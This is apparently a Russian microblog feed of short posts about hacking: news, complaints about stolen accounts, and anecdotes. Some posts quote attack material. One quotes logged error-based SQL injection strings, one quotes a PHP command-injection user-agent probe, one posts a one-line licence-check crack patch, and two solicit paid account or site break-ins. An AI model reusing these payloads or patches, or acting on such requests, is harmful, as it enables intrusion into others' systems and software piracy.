Чтобы добавлять сообщения и комментарии, .

@sitepapa:
sitepapa

Как взломать ВК зная логин sitepapa.ru

@nibb13:
nibb13

Воркшоп по взлому чего-то чем-то. Народ подоставал ноутбуки, но кувалд пока не вижу.

@nibb13:
nibb13

"Взломали" чей-то сайт в прямом эфире. (админка Joomla по стандартному адресу, admin:admin) Ни стыда ни совести, зал ржал и апплодировал. :)

@nibb13:
nibb13

ВНЕЗАПНО с Крейзом на хак-конфе. Рассказывают про XOR. Вау.

@nibb13:
nibb13

Тут к нам на сайт радио намедни заходил кто-то. Хотел чего-то. Декодированные QUERY_STRING:

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

Аж, даже, жалко товарища стало. Ведь на странице "о радио" прямым текстом сказано: "В качестве "базы данных" используется просто файловая система." А он мучался, параметры подбирал... :)

Остаётся надеяться, что это был просто тупой бот, нашедший нас в каком-нибудь гугеле. Не могли же "хакiры" настолько измельчать?

@486DX4-120:
486DX4-120

ptn.nr2.ru — ЛОЛ

@486DX4-120:
486DX4-120

Кто-то залез на мою АТС-ку, работающую на FreePBX distro и принялся майнить коины на ней.
Скорее всего залезли через nrpe (Nagios remote plugin executor). Вот что значит не доконца настроеный фаервол.

@Ta2i4:
Ta2i4

О последствиях взлома роутера и подмены DNS-сервера: habrahabr.ru
Можете проверить, есть ли в базе скомпрометированных QIWI-кошельков ваш: sms-area.org

@fefelo4ka:
fefelo4ka

Восстанавливаю доступ к Яндексу. Отправила им фото себя с паспортом, мне в ответ прислали длинное письмо, в т.ч. там есть:
Для установки новых пароля и контрольного вопроса/ответа нажмите на ссылку:
Вот только ссылку они НЕ ПРИЛОЖИЛИ.

@13oz:
13oz

xakep.ru — пока гром не грянет, мужик не перекрестится. какая к черту ИБ? =)

@hohoho:
hohoho

habrahabr.ru красиво

@NokitaKaze:
NokitaKaze

Лол, у меня на сайтах в логах куча людей с useragent'ом <?php system("id"); ?>
Смищные люди

@fefelo4ka:
fefelo4ka

Ой, как интересно!
Обращаем Ваше внимание, что платёж, который Вы оспариваете, зачислен на профессиональный счёт. Вы можете подать жалобу владельцу счёта.
Подробнее о том, как подать жалобу, Вы можете узнать здесь:
money.yandex.ru

Если владелец счёта после жалобы откажется возвращать деньги, Вы можете пройти процедуру идентификации, и мы предоставим Вам данные владельца счёта, на который ушли деньги, чтобы Вы могли обратиться в суд.
О том, как пройти идентификацию, можно прочитать на нашем сайте:
money.yandex.ru

@fefelo4ka:
fefelo4ka

Позвонила знакомому оперу. Она говорит, отдел К ещё существует, но как найти их координаты? :(

@fefelo4ka:
fefelo4ka

Сменила доступы к гуглу, ЖЖ, яндексу, майлу. Два последних были сломаны, первый — не знаю. Остальное — потом всё.

@fefelo4ka:
fefelo4ka

В отдел К я по любому сегодня пойду. Нашла ещё один взломанный аккаунт

@fefelo4ka:
fefelo4ka

А при синхронизации гуглоаккаунта у меня могли попереть данные?

@fefelo4ka:
fefelo4ka

насколько надёжен мастер-пароль в файрфоксе? Легко обходится?

@fefelo4ka:
fefelo4ka

Я спокойна. Я совершенн спокойна. Мне просто невыносимо хочется убивать.
Ночью с моего Якошелька вывели все деньги, собранные за вчера на матильду.
Сейчас буду менять пароли во всех системах, но как же я временами ненавижу людей и этот мир вообще...

@TheKinematiX:
TheKinematiX

cs317527.userapi.com

@werru:
werru

habrahabr.ru всё так просто... вот только меня ломать не надо, точка открыта.

@toxicdevil:
toxicdevil

мозга учусь летать,вот как взломать свой мозг,чтоб искреннее поверить ,что шагнув с возвышеннути я останусь висеть в воздухе,а не упаду вниз

@Ta2i4:
Ta2i4

ВНЕЗАПНО!!!!! Взломали мою учётку на одноклассниках. МОЮ, БЛЯТЬ!!! КАК????? Пароли от 8 до 20 символов. Kaspersky Internet Security — всегда обновлённые базы. За семь лет ни одного взлома, ни одного заражения. Это невозможно!

@zweipluse:
zweipluse

Школьник взломал сайт космического агентства Казахстана за минуту. securitylab.ru

@nibb13:
nibb13

Проект на фри-ланс.ру: free-lance.ru

Распаковать dll (Themida)

1. Распаковать dll
2. Изменить ip адрес (93.190.143.190) на тот который необходим
3. Запаковать обратно
4. Сделать инструкцию как менять впредь

Шикарно! Особенно с бюджетом в 1000 р. и плашкой "Данный бюджет рассчитан на исполнителей низкого класса".

Цимес в том, что полноценно Фемиду (упаковщик/протектор) вскрыли только однажды, старую вторую версию и то — сумасшедшие китайцы. Так что даже распаковать-поменять-запаковать обратно — уже проблема далеко не на тридцатник Евро. А про "инструкцию как менять впредь" вообше речи быть не может без полного курса реверсинга. :)

@iCat:
iCat

Неужто WoT был взломан? Администрация так настаивает на смене паролей, даже акцию соответствующую организовали... Что-то здесь не чисто...

@nibb13:
nibb13

Отучил от жадности софтину на AIR'е. Потратил кружку кофе времени. Так и запишем: RSA не помогает, если его применять бездумно.

@Metatron:
Metatron

Голая Скарлет Йохансон.
Неизвестный хакер скачал с iPhone Скарлет Йохансон, её фото в голом виде, которые она, не как звезда Голливуда, имеющая возможность воспользоваться услугами отличного фотографа, а как обычная симпатичная девушка, втихаря, и конечно не для широкого просмотра, делала себе сама на память.
Наивно доверять что то личное, современной технике. iPhone — это чужие глаза, в вашем кармане.
А у меня, благодаря современным технологиям, отличные фото.

sokol-ff.livejournal.com

@Umnik:
Umnik

i048.radikal.ru

@asmer:
asmer

webcache.googleusercontent.com — на днях ломали харьковский сайтег горсовета на тему евро 2012 ;). Это то, что там было :)

@Dimez:
Dimez

Нашёл новое место, кроме /tmp и /var/tmp, куда заливают эксплоиты и шеллы через дырявые скрипты — /dev/shm ;)

@asmer:
asmer

cripo.com.ua — В египте спецслужбы вроде как научились слушать скайп.

@scame:
scame

Человеку нужна помощь во взломе страницы в социальной сети Одноклассники. Если кто обладает навыками, просьба написать в личку для обсуждения условий.

@oxfn:
oxfn

Сайт MySQL хакнули SQL-инъекцией webplanet.ru
Это, конечно, не такой эпичный ФАИЛ как HBGary, но тоже блять смешно

@artru:
artru

На хакерском конкурсе взломали MacBook, iPhone и Internet Explorer. 11 марта в канадском Ванкувере завершается пятый ежегодный конкурс Pwn2Own. В этом мероприятии принимают участие профессиональные взломщики операционных систем и браузеров, занимающиеся поиском уязвимостей в популярном программном обеспечении различных производителей. В этом году на конкурсе были успешно взломаны ноутбук MacBook Air и смартфон iPhone 4, а также смартфон BlackBerry и браузер Internet Explorer. В награду хакеры получили денежное вознаграждение, а информация о способе взлома программ была передана разработчикам ПО.

Каждый год организаторы конкурса несколько видоизменяют его программу. Так, в 2011 году было решено сосредоточить усилия хакеров на взломе браузеров. При этом программу конкурса разделили на две группы: участникам предложили взламывать отдельно компьютерные и мобильные браузеры. artsjournal.ru

@scame:
scame

Жуйк, как взломать 3G модем, чтобы скорость была постоянно высокой?

@nibb13:
nibb13

Вскрытие системы защиты одной популярной софтины с проверкой ключа через сеть свелась к банальной замене:

Old=MOV AL,BYTE PTR SS:[EBP-2]
New=MOV AL,1

Я понимаю, что авторы особо и не заморачивались, но всё равно так нельзя. :(

@Mikel-Ard-Ri:
Mikel-Ard-Ri

Сайт касперского взломали и рассылали с него вирусы habrahabr.ru

@Umnik:
Umnik

Через дыру в ПО третьей стороны был вещи взломан официальный американский сайт компании. В течении трех часов пользователей перекидывало на фишинговую страницу, которая выглядела как Проводник WinXP с сообщениями о заражении системы.

От себя. Пока не ясно, был ли это реально взлом нашей стороны, но в целом это удар по репутации. можете глянуть на Хабре, но там концентрация долбоебов зашкаливает, при том, что комментариев пока мало. Рекомендую следить за темой на AM: anti-malware.ru Тут тоже хватает долбоебов, но важнее, что есть сотрудники (не официальные представители!) компании.

@skobkin-ru:
skobkin-ru

(12:13:59 AM) papa_karlo: есть сайт
(12:14:03 AM) papa_karlo: на сайте есть админка
(12:14:28 AM) papa_karlo: они готовы поспорить на 30 штук что нереально их сламать
(12:15:52 AM) papa_karlo: есть таке которые могут ебнуть его в исключительно спортивных целях?все законно как говориться.сработали бы мне 5 штук челу 25
---
.< моя голова